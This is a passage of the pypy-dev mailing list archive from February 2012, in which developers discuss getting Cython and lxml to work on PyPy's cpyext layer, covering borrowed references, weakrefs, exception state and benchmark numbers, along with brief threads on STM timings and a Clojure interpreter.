ElementTree if they only want to push XML out and I imagine that lxml would >> still be at least as fast as ElementTree under PyPy for the way in. > > Are you sure actually? I'm sure it's currently much slower, see here: http://blog.behnel.de/index.php?p=210 I'm not sure the quickly patched lxml is as fast in PyPy as it is in CPython, but there is certainly room for improvements, as I mentioned before. A substantial part of it runs in properly hand tuned C, after all, and thus doesn't need to go through cpyext or otherwise talk to PyPy. Stefan From fijall at gmail.com Sat Feb 18 10:56:40 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Sat, 18 Feb 2012 11:56:40 +0200 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: On Sat, Feb 18, 2012 at 11:48 AM, Stefan Behnel wrote: > Maciej Fijalkowski, 18.02.2012 10:35: >> On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >>> Given that XML processing is currently slower in PyPy than in CPython, I >>> don't think that's all that bad. Users can still switch their imports to >>> ElementTree if they only want to push XML out and I imagine that lxml would >>> still be at least as fast as ElementTree under PyPy for the way in. >> >> Are you sure actually? > > I'm sure it's currently much slower, see here: > > http://blog.behnel.de/index.php?p=210 > > I'm not sure the quickly patched lxml is as fast in PyPy as it is in > CPython, but there is certainly room for improvements, as I mentioned > before. A substantial part of it runs in properly hand tuned C, after all, > and thus doesn't need to go through cpyext or otherwise talk to PyPy. > > Stefan > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Can you please send me or post somewhere numbers? I'm fairly bad at trying to deduce them from the graph (although that doesn't change that the graph is very likely more readable). I'm not sure there are easy ways to optimize. Sure cpyext is slower than ctypes, but we cannot achieve much more than that. Certainly we cannot do unboxing (boxes might be only produced to make cpyext happy for example). Unless I'm misunderstanding your intentions, can you elaborate? I somehow doubt it's possible to make this run fast using cpyext (although there are definitely some ways). Maybe speeding up ElementTree would be the way if all we want to get is a fast XML processor? I doubt this is the case though. I'm waiting for other insights, I'm a bit clueless. Cheers, fijal From stefan_ml at behnel.de Sat Feb 18 11:20:16 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 11:20:16 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work! > > For example:: > html = etree.Element("html") > body = etree.SubElement(html, "body") > body.text = "TEXT" > br = etree.SubElement(body, "br") > br.tail = "TAIL" > html.xpath("//text()") > > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ The weakref changes are really unfortunate as they appear in one of the most performance critical spots of lxml's API: on-the-fly proxy creation. I can understand why the original code won't work as is, but could you elaborate on why the weak references are needed? Maybe there is a faster way of doing this? Stefan From arigo at tunes.org Sat Feb 18 11:46:09 2012 From: arigo at tunes.org (Armin Rigo) Date: Sat, 18 Feb 2012 11:46:09 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi Chris, On Sat, Feb 18, 2012 at 03:51, Chris Dashiell wrote: > I just wanted to let you know the numbers I got on a 32 core server. > > 1 thread: 3280 ms > 4 threads: 2665 ms > 8 threads: 2976 ms > 16 threads: 2878 ms > 32 threads: 2714 ms We just checked on a 24-core server (2 physical processors of 6x2 cores each). We also get strange results, notably: the 1-thread performance is often *better* than the 2-threads performance. We tried to use "taskset" to constrain which cores run the two threads, trying notably to keep them on the same physical processor in order to minimize inter-processor traffic, but the resulting performance numbers make no sense at all. For example with "taskset -c 0,2,3" it is much faster than with any 2-numbers-only combination of 0, 2 and 3, which makes no sense because it's only running 2 threads... Armin From stefan_ml at behnel.de Sat Feb 18 12:23:26 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 12:23:26 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Maciej Fijalkowski, 18.02.2012 10:56: > On Sat, Feb 18, 2012 at 11:48 AM, Stefan Behnel wrote: >> Maciej Fijalkowski, 18.02.2012 10:35: >>> On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >>>> Given that XML processing is currently slower in PyPy than in CPython, I >>>> don't think that's all that bad. Users can still switch their imports to >>>> ElementTree if they only want to push XML out and I imagine that lxml would >>>> still be at least as fast as ElementTree under PyPy for the way in. >>> >>> Are you sure actually? >> >> I'm sure it's currently much slower, see here: >> >> http://blog.behnel.de/index.php?p=210 >> >> I'm not sure the quickly patched lxml is as fast in PyPy as it is in >> CPython, but there is certainly room for improvements, as I mentioned >> before. A substantial part of it runs in properly hand tuned C, after all, >> and thus doesn't need to go through cpyext or otherwise talk to PyPy. > > Can you please send me or post somewhere numbers? I'm fairly bad at > trying to deduce them from the graph (although that doesn't change > that the graph is very likely more readable). You can get the code and the input files from here: http://lxml.de/etbench.tar.bz2 Note that this only compares the parser performance, but given how much faster CPython is here (we are talking seconds!), it'll be hard enough for PyPy to catch up with anything after such a head start. > I'm not sure there are easy ways to optimize. Sure cpyext is slower > than ctypes, but we cannot achieve much more than that. Certainly we > cannot do unboxing (boxes might be only produced to make cpyext happy > for example). Unless I'm misunderstanding your intentions, can you > elaborate? If you are referring to my comments on a faster interconnection towards Cython, I think it should be quite easy for PyPy to bypass Cython's Python function wrapper implementation (of type "CyFunction") to call directly into the underlying C function, with unboxed parameters. Cython could provide some sort of C signature introspection feature that PyPy could analyse and optimise for. But that's only that direction. Calling from Cython code back into PyPy compiled code efficiently is (from what I've heard so far) likely going to be trickier because Cython would have to know how to do that at C compilation time at the latest, while PyPy decides about theses things at runtime. Still, there could be a way for Cython to tell PyPy about the signature it wants to use for a specific unboxed call, and PyPy could generate an optimised wrapper for that and eventually a specialised function implementation for the statically known set of argument types in a specific call. A simple varargs approach may work here, imagine something like this: error = PyPy_CallFunctionWithSignature( func_obj_ptr, "(int, object, list, option=bint) -> int", i, object_ptr, list_obj_ptr, 0, int_result*) And given that the constant signature string would be interned by the C compiler, a simple pointer comparison should suffice for branching inside of PyPy. That would in many cases drop the need to convert all parameters to objects and to pack them into an argument tuple. Even keyword arguments could often be folded into positional varargs, as I indicated above. I can well imagine that PyPy could render such a calling convention quite efficient. > I somehow doubt it's possible to make this run fast using cpyext > (although there are definitely some ways). Maybe speeding up > ElementTree would be the way if all we want to get is a fast XML > processor? I doubt this is the case though. cElementTree, being younger, may contain a couple of optimisations that ElementTree lacks, but I doubt that there is still so much to get out of it. ET has already received quite a bit of tuning in the past (although not for PyPy). The main problem seems to be that the SAX driven callbacks from the expat parser inject too much overhead. And any decently sized XML document will trigger a lot of those. Stefan From arigo at tunes.org Sat Feb 18 12:54:44 2012 From: arigo at tunes.org (Armin Rigo) Date: Sat, 18 Feb 2012 12:54:44 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Antoni, On Fri, Feb 17, 2012 at 18:49, Antoni Segura Puimedon wrote: > Any suggestion on where to start reading pypy code/material? In your case, I'd suggest that you should first write a Clojure interpreter in regular Python, and then worry about making it RPython. This is done mostly by following the guidelines in http://doc.pypy.org/en/latest/coding-guide.html . Note also that, from what I've understood, it might be useful to integrate the Clojure interpreter with PyPy to allow calls to the rest of the Python standard library and built-in modules. This is relatively easy to do, and doesn't prevent the JIT from JITting the clojure interpreter. (You can have multiple JITs in the same process.) I imagine it would be done as a PyPy built-in module, which can be called from Python code in order to compile and execute Clojure code. To do this you would need to follow the general structure shown for example in pypy/module/_demo/. This is explained in http://doc.pypy.org/en/latest/coding-guide.html#mixed-modules . A bient?t, Armin. From celebdor at gmail.com Sat Feb 18 13:02:16 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Sat, 18 Feb 2012 13:02:16 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Armin, On Sat, Feb 18, 2012 at 12:54 PM, Armin Rigo wrote: > Hi Antoni, > > On Fri, Feb 17, 2012 at 18:49, Antoni Segura Puimedon > wrote: > > Any suggestion on where to start reading pypy code/material? > > In your case, I'd suggest that you should first write a Clojure > interpreter in regular Python, and then worry about making it RPython. > This is done mostly by following the guidelines in > http://doc.pypy.org/en/latest/coding-guide.html . > Thanks a lot for the advice. I will do that then, start from the basics. > > Note also that, from what I've understood, it might be useful to > integrate the Clojure interpreter with PyPy to allow calls to the rest > of the Python standard library and built-in modules. This is > relatively easy to do, and doesn't prevent the JIT from JITting the > clojure interpreter. (You can have multiple JITs in the same > process.) I imagine it would be done as a PyPy built-in module, which > can be called from Python code in order to compile and execute Clojure > code. > To do this you would need to follow the general structure shown for > example in pypy/module/_demo/. This is explained in > http://doc.pypy.org/en/latest/coding-guide.html#mixed-modules . > I will read it, but I expect to have a lot of questions about the integration :P > > > A bient?t, > > Armin. > Best regards, Antoni Segura Puimedon -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 13:04:26 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 13:04:26 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Maciej Fijalkowski, 18.02.2012 10:56: > On Sat, Feb 18, 2012 at 11:48 AM, Stefan Behnel wrote: >> Maciej Fijalkowski, 18.02.2012 10:35: >>> On Sat, Feb 18, 2012 at 11:27 AM, Stefan Behnel wrote: >>>> Given that XML processing is currently slower in PyPy than in CPython, I >>>> don't think that's all that bad. Users can still switch their imports to >>>> ElementTree if they only want to push XML out and I imagine that lxml would >>>> still be at least as fast as ElementTree under PyPy for the way in. >>> >>> Are you sure actually? >> >> I'm sure it's currently much slower, see here: >> >> http://blog.behnel.de/index.php?p=210 > > Can you please send me or post somewhere numbers? I'm fairly bad at > trying to deduce them from the graph (although that doesn't change > that the graph is very likely more readable). I just noticed that I still had them lying around, so I'm pasting them here as tabified table. Columns: 274KB hamlet.xml, 3.4MB ot.xml, 25MB Slavic text, 4.5MB structure, 6.2MB structure PP MiniDOM (PyPy) 0,091 0,369 2,441 1,363 3,152 MiniDOM 0,152 0,672 6,193 5,935 8,705 lxml.etree 0,014 0,041 0,454 0,131 0,199 ElementTree (PyPy) 0,045 0,293 2,282 1,005 2,247 ElementTree 0,104 0,385 3,274 3,374 4,178 cElementTree 0,022 0,056 0,459 0,192 0,478 This was using PyPy 1.7, times are in seconds. As you can see, CPython is faster by a factor of 5-10 for the larger files. Stefan From stefan_ml at behnel.de Sat Feb 18 13:38:56 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 13:38:56 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work! > > For example:: > html = etree.Element("html") > body = etree.SubElement(html, "body") > body.text = "TEXT" > br = etree.SubElement(body, "br") > br.tail = "TAIL" > html.xpath("//text()") > > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ I attached a reworked but untested patch for lxml. Could you try it? I couldn't find the PyWeakref_LockObject() function anywhere. That's a PyPy-only thing, right? I aliased it to (NULL) when compiling for CPython. I'll go through the Cython changes next, so I haven't got a working Cython version yet. Stefan -------------- next part -------------- A non-text attachment was scrubbed... Name: pypy-support.patch Type: text/x-patch Size: 4020 bytes Desc: not available URL: From faassen at startifact.com Sat Feb 18 14:11:53 2012 From: faassen at startifact.com (Martijn Faassen) Date: Sat, 18 Feb 2012 14:11:53 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hi there, On Sat, Feb 18, 2012 at 10:56 AM, Maciej Fijalkowski wrote: > I somehow doubt it's possible to make this run fast using cpyext > (although there are definitely some ways). Maybe speeding up > ElementTree would be the way if all we want to get is a fast XML > processor? I doubt this is the case though. lxml does a heck of a lot more than ElementTree. If all you need is a fast parser and serializer I figure you could wrap cElementTree using rpython or something like that. But lxml does a lot of other things. For some insight of why people want would lxml, there's an interesting discussion on google app engine's bug tracker about it. http://code.google.com/p/googleappengine/issues/detail?id=18 This type of discussion is instructive as PyPy's barriers to porting C extensions, while not "just wait for google" as the google app engine case, are still somewhat similar. In the end google finally ended up supporting numpy, lxml and a few other modules. Regards, Martijn From stefan_ml at behnel.de Sat Feb 18 14:28:40 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 14:28:40 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Martijn Faassen, 18.02.2012 14:11: > For some insight of why people want would lxml, there's an interesting > discussion on google app engine's bug tracker about it. > > http://code.google.com/p/googleappengine/issues/detail?id=18 > > This type of discussion is instructive as PyPy's barriers to porting C > extensions, while not "just wait for google" as the google app engine > case, are still somewhat similar. In the end google finally ended up > supporting numpy, lxml and a few other modules. Whoopsa! I totally wasn't aware that they actually did something about that seriously long-standing feature request. That's cool. Stefan From stefan_ml at behnel.de Sat Feb 18 14:36:45 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 14:36:45 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 10:08: > 2012/2/18 Stefan Behnel > I made some modifications to pypy, cython and lxml, > and now I can compile and install cython, lxml, and they seem to work! > > Here are the changes I made, some parts are really hacks and should be > polished: > lxml: http://paste.pocoo.org/show/552903/ > cython: http://paste.pocoo.org/show/552904/ The exception handling code that you deleted in __Pyx_GetException(), that which accesses exc_type and friends, is actually needed for correct semantics of Cython code and Python code. Basically, it implements the part of the except clause that moves the hot exception into sys.exc_info(). This equally applies to __Pyx_ExceptionSave() and __Pyx_ExceptionReset(), which form something like an exception backup frame around code sections that may raise exceptions themselves but must otherwise not touch the current exception. Specifically, as part of the finally clause. In order to fix this, is there a way to store away and restore the current sys.exc_info() in PyPy? Stefan From amauryfa at gmail.com Sat Feb 18 14:45:31 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 14:45:31 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > The weakref changes are really unfortunate as they appear in one of the > most performance critical spots of lxml's API: on-the-fly proxy creation. > > I can understand why the original code won't work as is, but could you > elaborate on why the weak references are needed? Maybe there is a faster > way of doing this? > PyObject->ob_refcnt only counts the number of PyObject references to the object, not eventual references held by other parts of the pypy interpreter. For example, PyTuple_GetItem() often returns something with refcnt=1; Two calls to "PyObject *x = PyTuple_GetItem(tuple, 0); Py_DECREF(x);" will return different values for the x pointer. But this model has issues with borrowed references. For example, this code is valid CPython, but will crash with cpyext: PyObject *exc = PyErr_NewException("error", PyExc_StandardError, NULL); PyDict_SetItemString(module_dict, "error", exc); Py_DECREF(exc); // exc is now a borrowed reference, but following line crash pypy: PyObject *another = PyErr_NewException("AnotherError", exc, NULL); PyDict_SetItemString(module_dict, "AnotherError", another); Py_DECREF(exc); In CPython, the code can continue using the created object: we don't own the reference, exc is now a borrowed reference, valid as long as the containing dict is valid; The refcount is 1 when the object is created, incremented when PyDict_SetItem stores it, and 1 again after DECREF. PyPy does it differently: a dictionary does not store PyObject* pointers, but "pypy objects" with no reference counting, and which address can change with a gc collection. PyDict_SetItemString will not change exc->refcnt, which will remain 1, then Py_DECREF will free the memory pointed by exc. There are mechanisms to keep the reference a bit longer, for example PyTuple_GET_ITEM will return a "temporary" reference that will be released when the tuple loses its last cpyext reference. Another way to say this is that with cpyext, a borrowed reference has to borrow from some other reference that you own. It can be a container, or in some cases the current "context", i.e. something that have the duration of the current C call. Otherwise, weak references must be used instead. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From amauryfa at gmail.com Sat Feb 18 14:52:30 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 14:52:30 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > The exception handling code that you deleted in __Pyx_GetException(), that > which accesses exc_type and friends, is actually needed for correct > semantics of Cython code and Python code. Basically, it implements the part > of the except clause that moves the hot exception into sys.exc_info(). > > This equally applies to __Pyx_ExceptionSave() and __Pyx_ExceptionReset(), > which form something like an exception backup frame around code sections > that may raise exceptions themselves but must otherwise not touch the > current exception. Specifically, as part of the finally clause. > > In order to fix this, is there a way to store away and restore the current > sys.exc_info() in PyPy? > I certainly was a bit fast to remove code there, and these exc_value and curexc_value have always been a delicate part of the CPython interpreter. One thing I don't understand for example, is why Cython needs to deal with sys.exc_info, when no other extension uses it for exception management. The only way to know for sure is to have unit tests with different use cases. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 15:10:49 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 15:10:49 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 14:52: > 2012/2/18 Stefan Behnel > >> The exception handling code that you deleted in __Pyx_GetException(), that >> which accesses exc_type and friends, is actually needed for correct >> semantics of Cython code and Python code. Basically, it implements the part >> of the except clause that moves the hot exception into sys.exc_info(). >> >> This equally applies to __Pyx_ExceptionSave() and __Pyx_ExceptionReset(), >> which form something like an exception backup frame around code sections >> that may raise exceptions themselves but must otherwise not touch the >> current exception. Specifically, as part of the finally clause. >> >> In order to fix this, is there a way to store away and restore the current >> sys.exc_info() in PyPy? >> > > I certainly was a bit fast to remove code there, and these > exc_value and curexc_value have always been a delicate > part of the CPython interpreter. > > One thing I don't understand for example, is why Cython needs to deal with > sys.exc_info, when no other extension uses it for exception management. Here's an example. Python code: def print_excinfo(): print(sys.exc_info()) Cython code: from stuff import print_excinfo try: raise TypeError except TypeError: print_excinfo() With the code removed, Cython will not store the TypeError in sys.exc_info(), so the Python code cannot see it. This may seem like an unimportant use case (who uses sys.exc_info() anyway, right?), but this becomes very visible when the code that uses sys.exc_info() is not user code but CPython itself, e.g. when raising another exception or when inspecting frames. Things grow really bad here, especially in Python 3. > The only way to know for sure is to have unit tests with different use > cases. Cython has loads of those in its test suite, as you can imagine. These things are so tricky to get right that it's futile to even try without growing a substantial test base of weird corner cases. Stefan From amauryfa at gmail.com Sat Feb 18 15:18:30 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 15:18:30 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > I couldn't find the PyWeakref_LockObject() function anywhere. That's a > PyPy-only thing, right? I aliased it to (NULL) when compiling for CPython. > Yes, this function is PyPy-only, to fix a flaw of PyWeakref_GetObject: it returns a borrowed reference, which is very dangerous because the object can disappear anytime: with a garbage collection, or another thread... Fortunately the GIL is here to protect you, but the only sane thing to do is to quickly INCREF the returned reference. PyWeakref_LockObject directly returns a new reference. In PyPy, the behavior of PyWeakref_GetObject is even worse: to avoid returning a refcount of zero, the returned reference is attached to the weakref, effectively turning it into a strong reference! I now realize that this was written before we implemented the "temporary container" for borrowed references: PyWeakref_GetObject() could return a reference valid for the duration of the current C call. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 15:23:32 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 15:23:32 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 15:18: > 2012/2/18 Stefan Behnel > >> I couldn't find the PyWeakref_LockObject() function anywhere. That's a >> PyPy-only thing, right? I aliased it to (NULL) when compiling for CPython. >> > > Yes, this function is PyPy-only, to fix a flaw of PyWeakref_GetObject: > it returns a borrowed reference, which is very dangerous because the object > can disappear anytime: with a garbage collection, or another thread... > Fortunately the GIL is here to protect you, but the only sane thing to do > is to quickly INCREF the returned reference. > PyWeakref_LockObject directly returns a new reference. > > In PyPy, the behavior of PyWeakref_GetObject is even worse: > to avoid returning a refcount of zero, the returned reference is attached > to the weakref, effectively turning it into a strong reference! > I now realize that this was written before we implemented the > "temporary container" for borrowed references: PyWeakref_GetObject() > could return a reference valid for the duration of the current C call. Do you mean that you could actually fix this in PyPy so that lxml won't have to use that function? Or would it still have to use it, because the references are stored away and thus become long-living? (i.e. longer than the C call) Stefan From amauryfa at gmail.com Sat Feb 18 15:41:42 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 15:41:42 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > Here's an example. > > Python code: > > def print_excinfo(): > print(sys.exc_info()) > > Cython code: > > from stuff import print_excinfo > > try: > raise TypeError > except TypeError: > print_excinfo() > > With the code removed, Cython will not store the TypeError in > sys.exc_info(), so the Python code cannot see it. This may seem like an > unimportant use case (who uses sys.exc_info() anyway, right?), but this > becomes very visible when the code that uses sys.exc_info() is not user > code but CPython itself, e.g. when raising another exception or when > inspecting frames. Things grow really bad here, especially in Python 3. > I think I understand now, thanks for your example. Things are a bit simpler in PyPy because these exceptions are stored in the frame that is currently handling it. At least better than CPython which stores it in one place, and has to somehow save the state of the previous frames. Did you consider adding such a function to CPython? "PyErr_SetCurrentFrameExceptionInfo"? For the record, pypy could implement it as: space.getexecutioncontext().gettopframe_nohidden().last_exception = operationerr i.e. the thing returned by sys.exc_info(). -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 16:29:43 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 16:29:43 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 18.02.2012 09:48: > Once we have the test suite runnable, we can set up a PyPy instance on our > CI server to get feed-back on any advances. > > https://sage.math.washington.edu:8091/hudson/ I've set up a build job for my development branch here: https://sage.math.washington.edu:8091/hudson/job/cython-scoder-pypy-nightly/ It builds and tests against the latest PyPy-c-jit nightly build, so that we get timely feedback for changes on either side. When is a good time to download the latest nightly build, BTW? Stefan From stefan_ml at behnel.de Sat Feb 18 17:46:09 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 17:46:09 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 18.02.2012 16:29: > Stefan Behnel, 18.02.2012 09:48: >> Once we have the test suite runnable, we can set up a PyPy instance on our >> CI server to get feed-back on any advances. >> >> https://sage.math.washington.edu:8091/hudson/ > > I've set up a build job for my development branch here: > > https://sage.math.washington.edu:8091/hudson/job/cython-scoder-pypy-nightly/ > > It builds and tests against the latest PyPy-c-jit nightly build, so that we > get timely feedback for changes on either side. And now the question is: how do I debug into PyPy? From the nightly build, I don't get any debugging symbols in gdb, just a useless list of call addresses (running the ref-counting related "arg_incref" test here): """ #0 0x0000000000ef93ef in ?? () #1 0x0000000000fca0cb in PyDict_Next () #2 0x00007f2564be8f6c in __pyx_pf_10arg_incref_f () from /levi/scratch/robertwb/hudson/hudson/jobs/cython-scoder-pypy-nightly/workspace/BUILD/run/c/arg_incref.pypy-18.so #3 0x00007f2564be8dd3 in __pyx_pw_10arg_incref_1f () from /levi/scratch/robertwb/hudson/hudson/jobs/cython-scoder-pypy-nightly/workspace/BUILD/run/c/arg_incref.pypy-18.so #4 0x000000000109e375 in ?? () #5 0x00000000010026e4 in ?? () [a couple of hundred more skipped that look like the two above] """ Aren't debugging symbols enabled for the nightly builds or is this what PyPy's JIT gives you? I used this file: http://buildbot.pypy.org/nightly/trunk/pypy-c-jit-latest-linux64.tar.bz2 And I guess source-level debugging isn't really available for the 37MB pypy file either, is it? BTW, I've also run into a problem with distutils under PyPy. The value of the CFLAGS environment variable is not being split into separate options so that gcc complains about "-O" not accepting the value "0 -ggdb -fPIC" when I pass CFLAGS="-O0 -ggdb -fPIC". So I can currently only pass a single CFLAGS option (my choice obviously being "-ggdb"). Stefan From faassen at startifact.com Sat Feb 18 18:48:47 2012 From: faassen at startifact.com (Martijn Faassen) Date: Sat, 18 Feb 2012 18:48:47 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hey, On Sat, Feb 18, 2012 at 11:20 AM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 18.02.2012 10:08: >> I made some modifications to pypy, cython and lxml, >> and now I can compile and install cython, lxml, and they seem to work! >> >> For example:: >> ? ? html = etree.Element("html") >> ? ? body = etree.SubElement(html, "body") >> ? ? body.text = "TEXT" >> ? ? br = etree.SubElement(body, "br") >> ? ? br.tail = "TAIL" >> ? ? html.xpath("//text()") >> >> Here are the changes I made, some parts are really hacks and should be >> polished: >> lxml: http://paste.pocoo.org/show/552903/ > > The weakref changes are really unfortunate as they appear in one of the > most performance critical spots of lxml's API: on-the-fly proxy creation. In fact I remember using weak references in early versions of lxml, and getting rid of them at the time sped things up a lot. Regards, Martijn From amauryfa at gmail.com Sat Feb 18 21:20:58 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 21:20:58 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > And now the question is: how do I debug into PyPy? From the nightly build, > I don't get any debugging symbols in gdb, just a useless list of call > addresses (running the ref-counting related "arg_incref" test here): > > """ > #0 0x0000000000ef93ef in ?? () > #1 0x0000000000fca0cb in PyDict_Next () > This one I know: It's a bug in our implementation of PyDict_Next() that I fixed today with 568fc4237bf8: http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 18 21:24:28 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 18 Feb 2012 21:24:28 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 21:20: > 2012/2/18 Stefan Behnel > >> And now the question is: how do I debug into PyPy? From the nightly build, >> I don't get any debugging symbols in gdb, just a useless list of call >> addresses (running the ref-counting related "arg_incref" test here): >> >> """ >> #0 0x0000000000ef93ef in ?? () >> #1 0x0000000000fca0cb in PyDict_Next () >> > > This one I know: > It's a bug in our implementation of PyDict_Next() that I fixed > today with 568fc4237bf8: > http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html Cool, thanks! We'll see the result on the next run then. Sounds like Cython's test suite could prove to be a rather good test harness for PyPy as well. Stefan From alex.gaynor at gmail.com Sat Feb 18 21:31:29 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Sat, 18 Feb 2012 15:31:29 -0500 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: On Sat, Feb 18, 2012 at 3:24 PM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 18.02.2012 21:20: > > 2012/2/18 Stefan Behnel > > > >> And now the question is: how do I debug into PyPy? From the nightly > build, > >> I don't get any debugging symbols in gdb, just a useless list of call > >> addresses (running the ref-counting related "arg_incref" test here): > >> > >> """ > >> #0 0x0000000000ef93ef in ?? () > >> #1 0x0000000000fca0cb in PyDict_Next () > >> > > > > This one I know: > > It's a bug in our implementation of PyDict_Next() that I fixed > > today with 568fc4237bf8: > > http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html > > Cool, thanks! We'll see the result on the next run then. > > Sounds like Cython's test suite could prove to be a rather good test > harness for PyPy as well. > > Stefan > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > Yes, ATM our cpyext test suite is basically built by reading the docs and writing our own tests. Unlike the rest of our test suite which draws from the CPython test suite, and bugs found by the great many Python programs (Django and SQLAlchemy in particular have a long history of finding bugs in every single nook and cranny). Alex -- "I disapprove of what you say, but I will defend to the death your right to say it." -- Evelyn Beatrice Hall (summarizing Voltaire) "The people's good is the highest law." -- Cicero -------------- next part -------------- An HTML attachment was scrubbed... URL: From amauryfa at gmail.com Sat Feb 18 21:46:32 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sat, 18 Feb 2012 21:46:32 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/18 Stefan Behnel > And now the question is: how do I debug into PyPy? Part of the answer: I never debug pypy. Even with debug symbols, the (generated) code is so complex that most of the time you cannot get anything interesting beyond the function names. But pypy is written in RPython, which can run on top of CPython. Even the cpyext layer can be interpreted; when the extension module calls PyDict_Next(), it actually steps into cpyext/dictobject.py! And it's really fun to add print statements, conditional breakpoints, etc. and experiment with the code without retranslating everything. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sun Feb 19 11:40:04 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 11:40:04 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 15:41: > 2012/2/18 Stefan Behnel >> Here's an example. >> >> 